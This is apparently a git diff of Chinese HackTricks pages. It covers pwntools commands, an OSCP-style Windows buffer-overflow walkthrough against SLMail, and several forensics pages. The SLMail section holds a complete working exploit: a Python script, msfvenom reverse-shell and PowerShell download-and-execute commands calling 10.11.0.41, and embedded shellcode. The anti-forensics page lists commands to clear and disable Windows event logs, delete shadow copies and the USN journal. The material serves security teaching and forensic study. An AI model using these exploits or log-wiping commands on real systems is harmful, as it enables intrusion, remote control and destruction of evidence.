获取一个模式
```
pwn cyclic 3000
pwn cyclic -l faad
```
**可以选择:**
- 使用的字母表(默认小写字符)
- 唯一模式的长度默认4
- 上下文16,32,64,linux,windows...
- 偏移量(-l
# Pwn debug
将 GDB 附加到一个进程
```
pwn debug --exec /bin/bash
pwn debug --pid 1234
pwn debug --process bash
```
**可以选择:**
- 按可执行文件、名称或 pid 上下文16,32,64,linux,windows...
- 要执行的 gdbscript
- sysrootpath
# Pwn 禁用 nx
禁用二进制文件的 nx
```
pwn disablenx <filepath>
```
# Pwn disasm
反汇编十六进制操作码
```
pwn disasm ffe4
```
**可以选择:**
- 上下文 (16,32,64,linux,windows...)
- 基地址
- 颜色(默认)/无颜色
# Pwn elfdiff
打印两个文件之间的差异
```
pwn elfdiff <file1> <file2>
```
# Pwn hex
获取十六进制表示
```bash
pwn hex hola #Get hex of "hola" ascii
```
# Pwn phd
获取十六进制转储
```
pwn phd <file>
```
**可以选择:**
- 显示的字节数
- 每行高亮字节的字节数
- 跳过开头的字节
# Pwn pwnstrip
# Pwn scrable
# Pwn shellcraft
获取 shellcodes
```
pwn shellcraft -l #List shellcodes
pwn shellcraft -l amd #Shellcode with amd in the name
pwn shellcraft -f hex amd64.linux.sh #Create in C and run
pwn shellcraft -r amd64.linux.sh #Run to test. Get shell
pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port
```
**可以选择:**
- shellcode 和 shellcode 的参数
- 输出文件
- 输出格式
- 调试(将 dbg 附加到 shellcode
- 之前(在代码之前调试陷阱)
- 之后
- 避免使用操作码(默认:不为 null 和新行)
- 运行 shellcode
- 有色/无色
- 列出系统调用
- 列出可能的 shellcodes
- 生成 ELF 作为共享库
# Pwn 模板
获取一个 python 模板
```
pwn template
```
**可以选择:** 主机,端口,用户,密码,路径和静默
# Pwn unhex
从十六进制到字符串
```
pwn unhex 686f6c61
```
# Pwn 更新
要更新 pwntools
```
pwn update
```
{{#include ../../banners/hacktricks-training.md}}

237
src/exploiting/windows-exploiting-basic-guide-oscp-lvl.md
View File

@ -1,237 +0,0 @@
# Windows Exploiting (Basic Guide - OSCP lvl)
{{#include ../banners/hacktricks-training.md}}
## **开始安装 SLMail 服务**
## 重启 SLMail 服务
每次你需要 **重启 SLMail 服务** 时,可以使用 Windows 控制台进行操作:
```
net start slmail
```
![](<../images/image (23) (1).png>)
## 非常基本的 Python 利用模板
```python
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip = '10.11.25.153'
port = 110
buffer = 'A' * 2700
try:
print "\nLaunching exploit..."
s.connect((ip, port))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nFinished!."
except:
print "Could not connect to "+ip+":"+port
```
## **更改 Immunity Debugger 字体**
前往 `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK`
## **将进程附加到 Immunity Debugger**
**File --> Attach**
![](<../images/image (24) (1) (1).png>)
**然后按下 START 按钮**
## **发送漏洞利用并检查 EIP 是否受到影响:**
![](<../images/image (25) (1) (1).png>)
每次你中断服务时,都应该重新启动它,如本页开头所示。
## 创建一个模式以修改 EIP
该模式应与您之前用于中断服务的缓冲区一样大。
![](<../images/image (26) (1) (1).png>)
```
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000
```
更改漏洞的缓冲区并设置模式,然后启动漏洞。
应该出现一个新的崩溃,但具有不同的 EIP 地址:
![](<../images/image (27) (1) (1).png>)
检查该地址是否在您的模式中:
![](<../images/image (28) (1) (1).png>)
```
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 39694438
```
看起来**我们可以在缓冲区的偏移量 2606 修改 EIP**。
检查修改漏洞的缓冲区:
```
buffer = 'A'*2606 + 'BBBB' + 'CCCC'
```
使用这个缓冲区EIP 崩溃应该指向 42424242 ("BBBB")
![](<../images/image (30) (1) (1).png>)
![](<../images/image (29) (1) (1).png>)
看起来它正在工作。
## 检查堆栈中的 Shellcode 空间
600B 应该足够用于任何强大的 shellcode。
让我们更改缓冲区:
```
buffer = 'A'*2606 + 'BBBB' + 'C'*600
```
启动新的漏洞利用并检查 EBP 以及有用的 shellcode 的长度
![](<../images/image (31) (1).png>)
![](<../images/image (32) (1).png>)
你可以看到当漏洞被触发时EBP 指向 shellcode并且我们有很多空间来放置 shellcode。
在这种情况下,我们有 **从 0x0209A128 到 0x0209A2D6 = 430B。** 足够了。
## 检查坏字符
再次更改缓冲区:
```
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
buffer = 'A'*2606 + 'BBBB' + badchars
```
坏字符从 0x01 开始,因为 0x00 几乎总是坏的。
重复执行利用这个新缓冲区,删除被发现无用的字符:
例如:
在这种情况下,你可以看到 **你不应该使用字符 0x0A**(由于字符 0x09内存中没有保存任何内容
![](<../images/image (33) (1).png>)
在这种情况下,你可以看到 **字符 0x0D 被避免**
![](<../images/image (34) (1).png>)
## 找到 JMP ESP 作为返回地址
使用:
```
!mona modules #Get protections, look for all false except last one (Dll of SO)
```
您将**列出内存映射**。搜索一些具有以下特征的 DLL
- **Rebase: False**
- **SafeSEH: False**
- **ASLR: False**
- **NXCompat: False**
- **OS Dll: True**
![](<../images/image (35) (1).png>)
现在,在此内存中,您应该找到一些 JMP ESP 字节,要做到这一点,请执行:
```
!mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes insie dll space (JMP ESP)
!mona find -s "\xff\xe4" -m slmfc.dll # Example in this case
```
**然后,如果找到某个地址,选择一个不包含任何坏字符的地址:**
![](<../images/image (36) (1).png>)
**在这种情况下,例如:\_0x5f4a358f**\_
## 创建 shellcode
```
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d'
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://10.11.0.41/nishang.ps1')\"" -f python -b '\x00\x0a\x0d'
```
如果漏洞利用没有成功但应该成功你可以通过ImDebg看到shellcode已到达尝试创建其他shellcode使用msfvenom为相同参数创建不同的shellcode
**在shellcode的开头添加一些NOPS**并使用它和返回地址来JMP ESP完成漏洞利用
```bash
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip = '10.11.25.153'
port = 110
shellcode = (
"\xb8\x30\x3f\x27\x0c\xdb\xda\xd9\x74\x24\xf4\x5d\x31\xc9\xb1"
"\x52\x31\x45\x12\x83\xed\xfc\x03\x75\x31\xc5\xf9\x89\xa5\x8b"
"\x02\x71\x36\xec\x8b\x94\x07\x2c\xef\xdd\x38\x9c\x7b\xb3\xb4"
"\x57\x29\x27\x4e\x15\xe6\x48\xe7\x90\xd0\x67\xf8\x89\x21\xe6"
"\x7a\xd0\x75\xc8\x43\x1b\x88\x09\x83\x46\x61\x5b\x5c\x0c\xd4"
"\x4b\xe9\x58\xe5\xe0\xa1\x4d\x6d\x15\x71\x6f\x5c\x88\x09\x36"
"\x7e\x2b\xdd\x42\x37\x33\x02\x6e\x81\xc8\xf0\x04\x10\x18\xc9"
"\xe5\xbf\x65\xe5\x17\xc1\xa2\xc2\xc7\xb4\xda\x30\x75\xcf\x19"
"\x4a\xa1\x5a\xb9\xec\x22\xfc\x65\x0c\xe6\x9b\xee\x02\x43\xef"
"\xa8\x06\x52\x3c\xc3\x33\xdf\xc3\x03\xb2\x9b\xe7\x87\x9e\x78"
"\x89\x9e\x7a\x2e\xb6\xc0\x24\x8f\x12\x8b\xc9\xc4\x2e\xd6\x85"
"\x29\x03\xe8\x55\x26\x14\x9b\x67\xe9\x8e\x33\xc4\x62\x09\xc4"
"\x2b\x59\xed\x5a\xd2\x62\x0e\x73\x11\x36\x5e\xeb\xb0\x37\x35"
"\xeb\x3d\xe2\x9a\xbb\x91\x5d\x5b\x6b\x52\x0e\x33\x61\x5d\x71"
"\x23\x8a\xb7\x1a\xce\x71\x50\x2f\x04\x79\x89\x47\x18\x79\xd8"
"\xcb\x95\x9f\xb0\xe3\xf3\x08\x2d\x9d\x59\xc2\xcc\x62\x74\xaf"
"\xcf\xe9\x7b\x50\x81\x19\xf1\x42\x76\xea\x4c\x38\xd1\xf5\x7a"
"\x54\xbd\x64\xe1\xa4\xc8\x94\xbe\xf3\x9d\x6b\xb7\x91\x33\xd5"
"\x61\x87\xc9\x83\x4a\x03\x16\x70\x54\x8a\xdb\xcc\x72\x9c\x25"
"\xcc\x3e\xc8\xf9\x9b\xe8\xa6\xbf\x75\x5b\x10\x16\x29\x35\xf4"
"\xef\x01\x86\x82\xef\x4f\x70\x6a\x41\x26\xc5\x95\x6e\xae\xc1"
"\xee\x92\x4e\x2d\x25\x17\x7e\x64\x67\x3e\x17\x21\xf2\x02\x7a"
"\xd2\x29\x40\x83\x51\xdb\x39\x70\x49\xae\x3c\x3c\xcd\x43\x4d"
"\x2d\xb8\x63\xe2\x4e\xe9"
)
buffer = 'A' * 2606 + '\x8f\x35\x4a\x5f' + "\x90" * 8 + shellcode
try:
print "\nLaunching exploit..."
s.connect((ip, port))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nFinished!."
except:
print "Could not connect to "+ip+":"+port
```
> [!WARNING]
> 有些 shellcode 会 **自我覆盖**,因此在 shellcode 之前始终添加一些 NOP 是很重要的。
## 改进 shellcode
添加以下参数:
```
EXITFUNC=thread -e x86/shikata_ga_nai
```
{{#include ../banners/hacktricks-training.md}}

82
src/forensics/basic-forensic-methodology/README.md
View File

@ -1,82 +0,0 @@
# 基本取证方法论
{{#include ../../banners/hacktricks-training.md}}
## 创建和挂载映像
{{#ref}}
../../generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md
{{#endref}}
## 恶意软件分析
这**并不是在获得映像后必须执行的第一步**。但是如果你有一个文件、文件系统映像、内存映像、pcap...你可以独立使用这些恶意软件分析技术,因此**记住这些操作是好的**
{{#ref}}
malware-analysis.md
{{#endref}}
## 检查映像
如果你获得了设备的**取证映像**,你可以开始**分析分区、文件系统**并**恢复**潜在的**有趣文件**(甚至是已删除的文件)。了解如何进行:
{{#ref}}
partitions-file-systems-carving/
{{#endref}}
根据使用的操作系统甚至平台,应该搜索不同的有趣文物:
{{#ref}}
windows-forensics/
{{#endref}}
{{#ref}}
linux-forensics.md
{{#endref}}
{{#ref}}
docker-forensics.md
{{#endref}}
## 深入检查特定文件类型和软件
如果你有非常**可疑的****文件**,那么**根据文件类型和创建它的软件**,可能会有几种**技巧**是有用的。\
阅读以下页面以了解一些有趣的技巧:
{{#ref}}
specific-software-file-type-tricks/
{{#endref}}
我想特别提到以下页面:
{{#ref}}
specific-software-file-type-tricks/browser-artifacts.md
{{#endref}}
## 内存转储检查
{{#ref}}
memory-dump-analysis/
{{#endref}}
## Pcap 检查
{{#ref}}
pcap-inspection/
{{#endref}}
## **反取证技术**
请记住可能使用反取证技术:
{{#ref}}
anti-forensic-techniques.md
{{#endref}}
## 威胁狩猎
{{#ref}}
file-integrity-monitoring.md
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}

151
src/forensics/basic-forensic-methodology/anti-forensic-techniques.md
View File

@ -1,151 +0,0 @@
{{#include ../../banners/hacktricks-training.md}}
# 时间戳
攻击者可能会对**文件的时间戳进行更改**以避免被检测。\
可以在MFT中的属性`$STANDARD_INFORMATION`**和**`$FILE_NAME`中找到时间戳。
这两个属性都有4个时间戳**修改**、**访问**、**创建**和**MFT注册修改**MACE或MACB
**Windows资源管理器**和其他工具显示来自**`$STANDARD_INFORMATION`**的信息。
## TimeStomp - 反取证工具
该工具**修改**`$STANDARD_INFORMATION`中的时间戳信息**但**不修改**`$FILE_NAME`中的信息。因此,可以**识别****可疑****活动**。
## Usnjrnl
**USN日志**更新序列号日志是NTFSWindows NT文件系统的一个特性用于跟踪卷的更改。[**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv)工具允许检查这些更改。
![](<../../images/image (449).png>)
上图是**工具**显示的**输出**,可以观察到对文件进行了**某些更改**。
## $LogFile
**对文件系统的所有元数据更改都会被记录**,这一过程称为[写前日志](https://en.wikipedia.org/wiki/Write-ahead_logging)。记录的元数据保存在名为`**$LogFile**`的文件中该文件位于NTFS文件系统的根目录。可以使用[LogFileParser](https://github.com/jschicht/LogFileParser)等工具解析此文件并识别更改。
![](<../../images/image (450).png>)
同样,在工具的输出中可以看到**某些更改已被执行**。
使用同一工具可以识别**时间戳被修改到哪个时间**
![](<../../images/image (451).png>)
- CTIME: 文件创建时间
- ATIME: 文件修改时间
- MTIME: 文件的MFT注册修改
- RTIME: 文件访问时间
## `$STANDARD_INFORMATION``$FILE_NAME`比较
识别可疑修改文件的另一种方法是比较两个属性上的时间,寻找**不匹配**。
## 纳秒
**NTFS**时间戳的**精度**为**100纳秒**。因此找到时间戳如2010-10-10 10:10:**00.000:0000的文件是非常可疑的**。
## SetMace - 反取证工具
该工具可以修改两个属性`$STARNDAR_INFORMATION``$FILE_NAME`。然而从Windows Vista开始必须在活动操作系统中修改此信息。
# 数据隐藏
NFTS使用集群和最小信息大小。这意味着如果一个文件占用一个半集群**剩余的一半将永远不会被使用**,直到文件被删除。因此,可以在这个松弛空间中**隐藏数据**。
有像slacker这样的工具可以在这个“隐藏”空间中隐藏数据。然而`$logfile``$usnjrnl`的分析可以显示某些数据已被添加:
![](<../../images/image (452).png>)
然后可以使用FTK Imager等工具检索松弛空间。请注意这种工具可以保存内容为模糊或甚至加密的形式。
# UsbKill
这是一个工具如果检测到USB端口的任何更改将**关闭计算机**。\
发现这一点的一种方法是检查正在运行的进程并**审查每个正在运行的python脚本**。
# 实时Linux发行版
这些发行版在**RAM**内存中**执行**。检测它们的唯一方法是**在NTFS文件系统以写权限挂载的情况下**。如果仅以读权限挂载,则无法检测到入侵。
# 安全删除
[https://github.com/Claudio-C/awesome-data-sanitization](https://github.com/Claudio-C/awesome-data-sanitization)
# Windows配置
可以禁用多种Windows日志记录方法以使取证调查变得更加困难。
## 禁用时间戳 - UserAssist
这是一个注册表项,维护用户运行每个可执行文件的日期和时间。
禁用UserAssist需要两个步骤
1. 设置两个注册表项,`HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs``HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`都设置为零以表示我们希望禁用UserAssist。
2. 清除看起来像`HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\<hash>`的注册表子树。
## 禁用时间戳 - Prefetch
这将保存有关执行的应用程序的信息目的是提高Windows系统的性能。然而这对于取证实践也可能有用。
- 执行`regedit`
- 选择文件路径`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters`
- 右键单击`EnablePrefetcher``EnableSuperfetch`
- 选择修改将每个值从1或3更改为0
- 重启
## 禁用时间戳 - 最后访问时间
每当从Windows NT服务器上的NTFS卷打开文件夹时系统会花时间**更新每个列出文件夹的时间戳字段**称为最后访问时间。在一个使用频繁的NTFS卷上这可能会影响性能。
1. 打开注册表编辑器Regedit.exe
2. 浏览到`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`
3. 查找`NtfsDisableLastAccessUpdate`。如果不存在请添加此DWORD并将其值设置为1这将禁用该过程。
4. 关闭注册表编辑器,并重启服务器。
## 删除USB历史
所有**USB设备条目**都存储在Windows注册表下的**USBSTOR**注册表项中该项包含在您将USB设备插入PC或笔记本电脑时创建的子键。您可以在这里找到此键`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`。**删除此项**将删除USB历史。\
您还可以使用工具[**USBDeview**](https://www.nirsoft.net/utils/usb_devices_view.html)确保您已删除它们(并删除它们)。
另一个保存USB信息的文件是`C:\Windows\INF`中的`setupapi.dev.log`。这也应该被删除。
## 禁用影子副本
**列出**影子副本使用`vssadmin list shadowstorage`\
**删除**它们运行`vssadmin delete shadow`
您还可以通过GUI删除它们按照[https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html)中提出的步骤。
要禁用影子副本,请参见[此处的步骤](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows)
1. 通过在单击Windows开始按钮后在文本搜索框中输入“services”打开服务程序。
2. 从列表中找到“卷影复制”,选择它,然后右键单击访问属性。
3. 从“启动类型”下拉菜单中选择禁用,然后通过单击应用和确定确认更改。
还可以在注册表`HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot`中修改将要在影子副本中复制的文件的配置。
## 覆盖已删除文件
- 您可以使用**Windows工具**`cipher /w:C`这将指示cipher从C驱动器的可用未使用磁盘空间中删除任何数据。
- 您还可以使用像[**Eraser**](https://eraser.heidi.ie)这样的工具。
## 删除Windows事件日志
- Windows + R --> eventvwr.msc --> 展开“Windows日志” --> 右键单击每个类别并选择“清除日志”
- `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"`
- `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }`
## 禁用Windows事件日志
- `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f`
- 在服务部分禁用“Windows事件日志”服务
- `WEvtUtil.exec clear-log``WEvtUtil.exe cl`
## 禁用$UsnJrnl
- `fsutil usn deletejournal /d c:`
{{#include ../../banners/hacktricks-training.md}}

95
src/forensics/basic-forensic-methodology/docker-forensics.md
View File

@ -1,95 +0,0 @@
# Docker Forensics
{{#include ../../banners/hacktricks-training.md}}
## Container modification
有怀疑认为某些docker容器被破坏
```bash
docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
cc03e43a052a lamp-wordpress "./run.sh" 2 minutes ago Up 2 minutes 80/tcp wordpress
```
您可以轻松地**找到与镜像相关的此容器所做的修改**,方法是:
```bash
docker diff wordpress
C /var
C /var/lib
C /var/lib/mysql
A /var/lib/mysql/ib_logfile0
A /var/lib/mysql/ib_logfile1
A /var/lib/mysql/ibdata1
A /var/lib/mysql/mysql
A /var/lib/mysql/mysql/time_zone_leap_second.MYI
A /var/lib/mysql/mysql/general_log.CSV
...
```
在之前的命令中,**C** 表示 **Changed**,而 **A** 表示 **Added**。\
如果你发现某个有趣的文件,比如 `/etc/shadow` 被修改了,你可以使用以下命令从容器中下载它,以检查恶意活动:
```bash
docker cp wordpress:/etc/shadow.
```
您还可以通过运行一个新容器并从中提取文件来**与原始文件进行比较**
```bash
docker run -d lamp-wordpress
docker cp b5d53e8b468e:/etc/shadow original_shadow #Get the file from the newly created container
diff original_shadow shadow
```
如果您发现**添加了一些可疑文件**,您可以访问容器并检查它:
```bash
docker exec -it wordpress bash
```
## 图像修改
当你获得一个导出的 docker 镜像(可能是 `.tar` 格式)时,你可以使用 [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) 来 **提取修改的摘要**
```bash
docker save <image> > image.tar #Export the image to a .tar file
container-diff analyze -t sizelayer image.tar
container-diff analyze -t history image.tar
container-diff analyze -t metadata image.tar
```
然后,您可以**解压缩**映像并**访问 blobs**以搜索您可能在更改历史中发现的可疑文件:
```bash
tar -xf image.tar
```
### 基本分析
您可以通过运行以下命令获取**基本信息**
```bash
docker inspect <image>
```
您还可以通过以下方式获取**更改历史**的摘要:
```bash
docker history --no-trunc <image>
```
您还可以使用以下命令从镜像生成一个 **dockerfile**
```bash
alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage"
dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers>
```
### Dive
为了在docker镜像中查找添加/修改的文件,您还可以使用 [**dive**](https://github.com/wagoodman/dive)(从 [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0) 下载):
```bash
#First you need to load the image in your docker repo
sudo docker load < image.tar 1
Loaded image: flask:latest
#And then open it with dive:
sudo dive flask:latest
```
这使您能够**浏览不同的 Docker 镜像块**并检查哪些文件被修改/添加。**红色**表示添加,**黄色**表示修改。使用**tab**键切换到其他视图,使用**space**键折叠/打开文件夹。
使用 die您将无法访问镜像不同阶段的内容。要做到这一点您需要**解压每一层并访问它**。\
您可以通过在解压镜像的目录中执行以下命令来解压镜像的所有层:
```bash
tar -xf image.tar
for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done
```
## 从内存中获取凭证
请注意,当您在主机内部运行 docker 容器时,**您可以通过运行 `ps -ef` 查看容器中正在运行的进程**。
因此(作为 root 用户),您可以**从主机转储进程的内存**并搜索**凭证**,就像[**以下示例**](../../linux-hardening/privilege-escalation/index.html#process-memory)中所示。
{{#include ../../banners/hacktricks-training.md}}

26
src/forensics/basic-forensic-methodology/file-integrity-monitoring.md
View File

@ -1,26 +0,0 @@
{{#include ../../banners/hacktricks-training.md}}
# 基线
基线是对系统某些部分进行快照,以**与未来状态进行比较以突出变化**。
例如,您可以计算并存储文件系统中每个文件的哈希值,以便找出哪些文件被修改。\
这也可以应用于创建的用户帐户、正在运行的进程、正在运行的服务以及任何其他不应有太大变化的内容。
## 文件完整性监控
文件完整性监控FIM是一种关键的安全技术通过跟踪文件的变化来保护IT环境和数据。它涉及两个关键步骤
1. **基线比较:** 使用文件属性或加密校验和如MD5或SHA-2建立基线以便进行未来的比较以检测修改。
2. **实时变更通知:** 当文件被访问或更改时,立即获得警报,通常通过操作系统内核扩展实现。
## 工具
- [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring)
- [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software)
## 参考
- [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it)
{{#include ../../banners/hacktricks-training.md}}

370
src/forensics/basic-forensic-methodology/linux-forensics.md
View File

@ -1,370 +0,0 @@
# Linux Forensics
{{#include ../../banners/hacktricks-training.md}}
## 初始信息收集
### 基本信息
首先,建议准备一个**USB**,上面有**已知良好的二进制文件和库**你可以直接获取ubuntu并复制文件夹 _/bin_, _/sbin_, _/lib,__/lib64_然后挂载USB并修改环境变量以使用这些二进制文件
```bash
export PATH=/mnt/usb/bin:/mnt/usb/sbin
export LD_LIBRARY_PATH=/mnt/usb/lib:/mnt/usb/lib64
```
一旦您配置系统以使用良好且已知的二进制文件,您就可以开始**提取一些基本信息**
```bash
date #Date and time (Clock may be skewed, Might be at a different timezone)
uname -a #OS info
ifconfig -a || ip a #Network interfaces (promiscuous mode?)
ps -ef #Running processes
netstat -anp #Proccess and ports
lsof -V #Open files
netstat -rn; route #Routing table
df; mount #Free space and mounted devices
free #Meam and swap space
w #Who is connected
last -Faiwx #Logins
lsmod #What is loaded
cat /etc/passwd #Unexpected data?
cat /etc/shadow #Unexpected data?
find /directory -type f -mtime -1 -print #Find modified files during the last minute in the directory
```
#### 可疑信息
在获取基本信息时,您应该检查一些奇怪的事情,例如:
- **Root 进程** 通常运行在低 PIDS因此如果您发现一个大 PID 的 root 进程,您可能会怀疑
- 检查 **没有 shell 的用户的注册登录**`/etc/passwd`
- 检查 **没有 shell 的用户的密码哈希**`/etc/shadow`
### 内存转储
要获取运行系统的内存,建议使用 [**LiME**](https://github.com/504ensicsLabs/LiME)。\
**编译** 它,您需要使用受害者机器正在使用的 **相同内核**
> [!NOTE]
> 请记住,您 **不能在受害者机器上安装 LiME 或其他任何东西**,因为这会对其进行多次更改
因此,如果您有一个相同版本的 Ubuntu您可以使用 `apt-get install lime-forensics-dkms`\
在其他情况下,您需要从 github 下载 [**LiME**](https://github.com/504ensicsLabs/LiME) 并使用正确的内核头文件进行编译。要 **获取受害者机器的确切内核头文件**,您可以直接 **复制目录** `/lib/modules/<kernel version>` 到您的机器,然后使用它们 **编译** LiME
```bash
make -C /lib/modules/<kernel version>/build M=$PWD
sudo insmod lime.ko "path=/home/sansforensics/Desktop/mem_dump.bin format=lime"
```
LiME 支持 3 种 **格式**
- 原始(每个段连接在一起)
- 填充(与原始相同,但右侧位用零填充)
- Lime推荐格式带有元数据
LiME 还可以用于 **通过网络发送转储**,而不是使用类似 `path=tcp:4444` 的方式将其存储在系统上。
### 磁盘成像
#### 关机
首先,您需要 **关闭系统**。这并不总是一个选项,因为有时系统可能是公司无法承受关闭的生产服务器。\
**2 种** 关闭系统的方法,**正常关机** 和 **“拔掉插头”关机**。第一种方法将允许 **进程正常终止**,并使 **文件系统** **同步**,但这也可能允许潜在的 **恶意软件** **破坏证据**。“拔掉插头”方法可能会带来 **一些信息丢失**(由于我们已经获取了内存的镜像,丢失的信息不会太多),并且 **恶意软件将没有机会** 采取任何行动。因此,如果您 **怀疑** 可能存在 **恶意软件**,请在系统上执行 **`sync`** **命令** 然后拔掉插头。
#### 获取磁盘镜像
重要的是要注意,在 **将计算机连接到与案件相关的任何设备之前**,您需要确保它将以 **只读方式挂载**,以避免修改任何信息。
```bash
#Create a raw copy of the disk
dd if=<subject device> of=<image file> bs=512
#Raw copy with hashes along the way (more secure as it checks hashes while it's copying the data)
dcfldd if=<subject device> of=<image file> bs=512 hash=<algorithm> hashwindow=<chunk size> hashlog=<hash file>
dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes
```
### 磁盘映像预分析
对没有更多数据的磁盘映像进行成像。
```bash
#Find out if it's a disk image using "file" command
file disk.img
disk.img: Linux rev 1.0 ext4 filesystem data, UUID=59e7a736-9c90-4fab-ae35-1d6a28e5de27 (extents) (64bit) (large files) (huge files)
#Check which type of disk image it's
img_stat -t evidence.img
raw
#You can list supported types with
img_stat -i list
Supported image format types:
raw (Single or split raw file (dd))
aff (Advanced Forensic Format)
afd (AFF Multiple File)
afm (AFF with external metadata)
afflib (All AFFLIB image formats (including beta ones))
ewf (Expert Witness Format (EnCase))
#Data of the image
fsstat -i raw -f ext4 disk.img
FILE SYSTEM INFORMATION
--------------------------------------------
File System Type: Ext4
Volume Name:
Volume ID: 162850f203fd75afab4f1e4736a7e776
Last Written at: 2020-02-06 06:22:48 (UTC)
Last Checked at: 2020-02-06 06:15:09 (UTC)
Last Mounted at: 2020-02-06 06:15:18 (UTC)
Unmounted properly
Last mounted on: /mnt/disk0
Source OS: Linux
[...]
#ls inside the image
fls -i raw -f ext4 disk.img
d/d 11: lost+found
d/d 12: Documents
d/d 8193: folder1
d/d 8194: folder2
V/V 65537: $OrphanFiles
#ls inside folder
fls -i raw -f ext4 disk.img 12
r/r 16: secret.txt
#cat file inside image
icat -i raw -f ext4 disk.img 16
ThisisTheMasterSecret
```
## 搜索已知恶意软件
### 修改过的系统文件
Linux 提供了确保系统组件完整性的工具,这对于发现潜在问题文件至关重要。
- **基于 RedHat 的系统**:使用 `rpm -Va` 进行全面检查。
- **基于 Debian 的系统**:使用 `dpkg --verify` 进行初步验证,然后使用 `debsums | grep -v "OK$"`(在使用 `apt-get install debsums` 安装 `debsums` 后)来识别任何问题。
### 恶意软件/根套件检测器
阅读以下页面以了解可以帮助查找恶意软件的工具:
{{#ref}}
malware-analysis.md
{{#endref}}
## 搜索已安装程序
为了有效搜索 Debian 和 RedHat 系统上已安装的程序,可以考虑利用系统日志和数据库,同时在常见目录中进行手动检查。
- 对于 Debian检查 _**`/var/lib/dpkg/status`**__**`/var/log/dpkg.log`**_ 以获取有关软件包安装的详细信息,使用 `grep` 过滤特定信息。
